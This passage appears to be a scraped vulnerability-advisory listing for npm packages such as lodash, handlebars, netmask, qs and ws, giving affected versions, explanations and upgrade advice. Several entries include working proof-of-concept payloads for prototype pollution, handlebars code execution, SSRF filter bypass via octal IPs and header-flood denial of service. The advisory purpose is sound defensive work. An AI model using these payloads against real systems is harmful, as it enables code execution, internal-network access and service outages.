From there, the number of steps the engine must use to validate a string just continues to grow.

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade ajv to version 6.14.0, 8.18.0 or higher.

References

• GitHub Commit
• GitHub Issue
• GitHub PR
• GitHub PR
• Red Hat Bugzilla Bug
• Vulnerability Report

Overview

Affected versions of this package are vulnerable to Asymmetric Resource Consumption (Amplification) via the extendedparser and urlencoded functions when the URL encoding process is enabled. An attacker can flood the server with a large number of specially crafted requests.

Remediation

Upgrade body-parser to version 1.20.3 or higher.

References

• GitHub Commit

Overview

lodash is a modern JavaScript utility library delivering modularity, performance, & extras.

Affected versions of this package are vulnerable to Prototype Pollution. The function zipObjectDeep can be tricked into adding or modifying properties of the Object prototype. These properties will be present on all objects.

PoC

const _ = require('lodash');

_.zipObjectDeep(['__proto__.z'],[123]);

console.log(z); // 123

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

• Unsafe Object recursive merge

• Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

• Application server

• Web server

• Web browser

How to prevent

1. Freeze the prototype— use Object.freeze (Object.prototype).

2. Require schema validation of JSON input.

3. Avoid using unsafe recursive merge functions.

4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade lodash to version 4.17.20 or higher.

References

• GitHub Commit
• GitHub PR

Overview

nodemailer is an Easy as cake e-mail sending from your Node.js applications

Affected versions of this package are vulnerable to Uncontrolled Recursion in the addressparser function. An attacker can cause the process to terminate immediately by sending an email address header containing deeply nested groups, separated by many :s.

Remediation

Upgrade nodemailer to version 7.0.11 or higher.

References

• GitHub Commit
• Red Hat Bugzilla Bug

Overview

underscore is a JavaScript's functional programming helper library.

Affected versions of this package are vulnerable to Uncontrolled Recursion through the _.flatten() or _.isEqual() functions that are used without a depth limit. An attacker can cause the application to crash or become unresponsive by supplying deeply nested data structures as input, leading to stack exhaustion.

Workaround

This vulnerability can be mitigated by enforcing a depth limit on data structures created from untrusted input (e.g., limiting nesting to 1000 levels or fewer), or by passing a finite depth limit as the second argument to the _.flatten() function.

Remediation

Upgrade underscore to version 1.13.8 or higher.

References

• GitHub Commit
• GitHub Commit
• GitHub Issue
• Release Notes

Overview

ajv is an Another JSON Schema Validator

Affected versions of this package are vulnerable to Prototype Pollution. A carefully crafted JSON schema could be provided that allows execution of other code by prototype pollution. (While untrusted schemas are recommended against, the worst case of an untrusted schema should be a denial of service, not execution of code.)

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

• Unsafe Object recursive merge

• Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

• Application server

• Web server

• Web browser

How to prevent

1. Freeze the prototype— use Object.freeze (Object.prototype).

2. Require schema validation of JSON input.

3. Avoid using unsafe recursive merge functions.

4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade ajv to version 6.12.3 or higher.

References

• HackerOne Report

Overview

bson is a BSON Parser for node and browser.

Affected versions of this package are vulnerable to Internal Property Tampering. The package will ignore an unknown value for an object's _bsotype, leading to cases where an object is serialized as a document rather than the intended BSON type.

NOTE: This vulnerability has also been identified as: CVE-2019-2391

Remediation

Upgrade bson to version 1.1.4 or higher.

References

• GitHub Commit
• Release Note

Overview

bson is a BSON Parser for node and browser.

Affected versions of this package are vulnerable to Internal Property Tampering. The package will ignore an unknown value for an object's _bsotype, leading to cases where an object is serialized as a document rather than the intended BSON type.

NOTE: This vulnerability has also been identified as: CVE-2020-7610

Remediation

Upgrade bson to version 1.1.4 or higher.

References

• GitHub Commit
• Release Note

Overview

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Arbitrary Code Execution. The package's lookup helper doesn't validate templates correctly, allowing attackers to submit templates that execute arbitrary JavaScript in the system.

PoC

    {{#with split as |a|}}
        {{pop (push "alert('Vulnerable Handlebars JS');")}}
        {{#with (concat (lookup join (slice 0 1)))}}
            {{#each (slice 2 3)}}
                {{#with (apply 0 a)}}
                    {{.}}
                {{/with}}
            {{/each}}
        {{/with}}
    {{/with}}
{{/with}}

Remediation

Upgrade handlebars to version 3.0.8, 4.5.3 or higher.

References

• NPM Security Advisory #1
• NPM Security Advisory #2

Overview

netmask is a library to parse IPv4 CIDR blocks.

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF). It incorrectly evaluates individual IPv4 octets that contain octal strings as left-stripped integers, leading to an inordinate attack surface on hundreds of thousands of projects that rely on netmask to filter or evaluate IPv4 block ranges, both inbound and outbound.

For example, a remote unauthenticated attacker can request local resources using input data 0177.0.0.1 (127.0.0.1), which netmask evaluates as the public IP 177.0.0.1. Contrastingly, a remote authenticated or unauthenticated attacker can input the data 0127.0.0.01 (87.0.0.1) as localhost, yet the input data is a public IP and can potentially cause local and remote file inclusion (LFI/RFI). A remote authenticated or unauthenticated attacker can bypass packages that rely on netmask to filter IP address blocks to reach intranets, VPNs, containers, adjacent VPC instances, or LAN hosts, using input data such as 012.0.0.1 (10.0.0.1), which netmask evaluates as 12.0.0.1 (public).

NOTE: This vulnerability has also been identified as: CVE-2021-29418

Remediation

Upgrade netmask to version 2.0.1 or higher.

References

• GitHub Commit
• PoC
• Researcher Report
• Nuclei Templates

Overview

netmask is a library to parse IPv4 CIDR blocks.

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF). It incorrectly evaluates individual IPv4 octets that contain octal strings as left-stripped integers, leading to an inordinate attack surface on hundreds of thousands of projects that rely on netmask to filter or evaluate IPv4 block ranges, both inbound and outbound.

For example, a remote unauthenticated attacker can request local resources using input data 0177.0.0.1 (127.0.0.1), which netmask evaluates as the public IP 177.0.0.1. Contrastingly, a remote authenticated or unauthenticated attacker can input the data 0127.0.0.01 (87.0.0.1) as localhost, yet the input data is a public IP and can potentially cause local and remote file inclusion (LFI/RFI). A remote authenticated or unauthenticated attacker can bypass packages that rely on netmask to filter IP address blocks to reach intranets, VPNs, containers, adjacent VPC instances, or LAN hosts, using input data such as 012.0.0.1 (10.0.0.1), which netmask evaluates as 12.0.0.1 (public).

NOTE: This vulnerability has also been identified as: CVE-2021-28918

Remediation

Upgrade netmask to version 2.0.1 or higher.

References

• GitHub Commit
• PoC
• Researcher Report

Overview

xmldom is an A pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module.

Affected versions of this package are vulnerable to XML Injection via the XMLSerializer() function. An attacker can manipulate the structure and integrity of generated XML documents by injecting attacker-controlled markup containing the CDATA terminator ]]> through CDATA section content, which is not properly validated or sanitized during serialization. This can result in unauthorized XML elements or attributes being inserted, potentially leading to business logic manipulation or privilege escalation in downstream consumers.

Remediation

There is no fixed version for xmldom.

References

• GitHub Advisory
• GitHub Commit
• GitHub Release
• GitHub Release

Overview

Affected versions of this package are vulnerable to Prototype Pollution via the mapValues() method, due to improper check in createObjectIterator function.

PoC

//when objects are parsed, all properties are created as own (the objects can come from outside sources (http requests/ file))
const hasOwn = JSON.parse('{"__proto__": {"isAdmin": true}}');

//does not have the property,  because it's inside object's own "__proto__"
console.log(hasOwn.isAdmin);

async.mapValues(hasOwn, (val, key, cb) => cb(null, val), (error, result) => {
  // after the method executes, hasOwn.__proto__ value (isAdmin: true) replaces the prototype of the newly created object, leading to potential exploits.
  console.log(result.isAdmin);
});

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

• Unsafe Object recursive merge

• Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

• Application server

• Web server

• Web browser

How to prevent

1. Freeze the prototype— use Object.freeze (Object.prototype).

2. Require schema validation of JSON input.

3. Avoid using unsafe recursive merge functions.

4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade async to version 2.6.4, 3.2.2 or higher.

References

• GitHub Backport PR
• GitHub Commit
• GitHub Commit
• PoC

Overview

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Denial of Service (DoS). The package's parser may be forced into an endless loop while processing specially-crafted templates, which may allow attackers to exhaust system resources leading to Denial of Service.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

• A The string must start with the letter 'A'
• (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
• D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

1. CCC
2. CC+C
3. C+CC
4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade handlebars to version 4.4.5 or higher.

References

• GitHub Commit
• GitHub Issue
• NPM Security Advisory

Overview

lodash is a modern JavaScript utility library delivering modularity, performance, & extras.

Affected versions of this package are vulnerable to Prototype Pollution through the zipObjectDeep function due to improper user input sanitization in the baseZipObject function.

PoC

lodash.zipobjectdeep:

const zipObjectDeep = require("lodash.zipobjectdeep");

let emptyObject = {};


console.log(`[+] Before prototype pollution : ${emptyObject.polluted}`);
//[+] Before prototype pollution : undefined

zipObjectDeep(["constructor.prototype.polluted"], [true]);
//we inject our malicious attributes in the vulnerable function

console.log(`[+] After prototype pollution : ${emptyObject.polluted}`);
//[+] After prototype pollution : true

lodash:

const test = require("lodash");

let emptyObject = {};


console.log(`[+] Before prototype pollution : ${emptyObject.polluted}`);
//[+] Before prototype pollution : undefined

test.zipObjectDeep(["constructor.prototype.polluted"], [true]);
//we inject our malicious attributes in the vulnerable function

console.log(`[+] After prototype pollution : ${emptyObject.polluted}`);
//[+] After prototype pollution : true

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

• Unsafe Object recursive merge

• Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

• Application server

• Web server

• Web browser

How to prevent

1. Freeze the prototype— use Object.freeze (Object.prototype).

2. Require schema validation of JSON input.

3. Avoid using unsafe recursive merge functions.

4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade lodash to version 4.17.17 or higher.

References

• GitHub Gist
• Vulnerable Code

Overview

merge is a library that allows you to merge multiple objects into one, optionally creating a new cloned object. Similar to the jQuery.extend but more flexible. Works in Node.js and the browser.

Affected versions of this package are vulnerable to Prototype Pollution. The 'merge' function already checks for 'proto' keys in an object to prevent prototype pollution, but does not check for 'constructor' or 'prototype' keys.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

• Unsafe Object recursive merge

• Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

• Application server

• Web server

• Web browser

How to prevent

1. Freeze the prototype— use Object.freeze (Object.prototype).

2. Require schema validation of JSON input.

3. Avoid using unsafe recursive merge functions.

4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade merge to version 2.1.0 or higher.

References

• GitHub PR

Overview

mongodb is an official MongoDB driver for Node.js.

Affected versions of this package are vulnerable to Denial of Service (DoS). The package fails to properly catch an exception when a collection name is invalid and the DB does not exist, crashing the application.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

• A The string must start with the letter 'A'
• (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
• D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

1. CCC
2. CC+C
3. C+CC
4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade mongodb to version 3.1.13 or higher.

References

• NPM Security Advisory

Overview

oauth2-server is a Complete, framework-agnostic, compliant and well tested module for implementing an OAuth2 Server in node.js

Affected versions of this package are vulnerable to Access Restriction Bypass via implementation of OAuth 2.0 without PKCE. It does not prevent authorization code injection. This is similar to CVE-2020-7692.

NOTE: this vulnerability is disputed by the vendor, who states 'As RFC7636 is an extension, I think the claim in the Readme of "RFC 6749 compliant" is valid and not misleading and I also therefore wouldn't describe this as a "vulnerability" with the library per se.'

Remediation

There is no fixed version for oauth2-server.

References

• GitHub Issue
• GitHub PR

Overview

qs is a querystring parser that supports nesting and arrays, with a depth limit.

Affected versions of this package are vulnerable to Prototype Poisoning which allows attackers to cause a Node process to hang, processing an Array object whose prototype has been replaced by one with an excessive length value.

Note: In many typical Express use cases, an unauthenticated remote attacker can place the attack payload in the query string of the URL that is used to visit the application, such as a[__proto__]=b&a[__proto__]&a[length]=100000000.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

• High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

• Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade qs to version 6.2.4, 6.3.3, 6.4.1, 6.5.3, 6.6.1, 6.7.3, 6.8.3, 6.9.7, 6.10.3 or higher.

References

• GitHub PR
• RedHat Bugzilla Bug
• Researcher Advisory

Overview

useragent allows you to parse user agent string with high accuracy by using hand tuned dedicated regular expressions for browser matching.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) when passing long user-agent strings.

This is due to incomplete fix for this vulnerability: https://snyk.io/vuln/SNYK-JS-USERAGENT-11000.

An attempt to fix the vulnerability has been pushed to master.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

• A The string must start with the letter 'A'
• (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
• D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

1. CCC
2. CC+C
3. C+CC
4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

A fix was pushed into the master branch but not yet published.

References

• GitHub Commit

• GitHub PR

• GitHub PR

• GitHub PR

• Hackerone Report

Overview

ws is a simple to use websocket client, server and console for node.js.

Affected versions of this package are vulnerable to Denial of Service (DoS) when the number of received headers exceed the server.maxHeadersCount or request.maxHeadersCount threshold.

Workaround

This issue can be mitigating by following these steps:

1. Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.

2. Set server.maxHeadersCount to 0 so that no limit is applied.

PoC

const http = require('http');
const WebSocket = require('ws');

const server = http.createServer();

const wss = new WebSocket.Server({ server });

server.listen(function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: server.address().port
  });

  request.end();
});

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

• High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

• Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade ws to version 5.2.4, 6.2.3, 7.5.10, 8.17.1 or higher.

References

• GitHub Commit
• GitHub Commit
• GitHub Commit
• GitHub Commit
• GitHub Issue
• GitHub PR
• GitHub Release

Overview

hawk is a library for the HTTP Hawk Authentication Scheme.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) in header parsing where each added character in the attacker's input increases the computation time exponentially.

Details

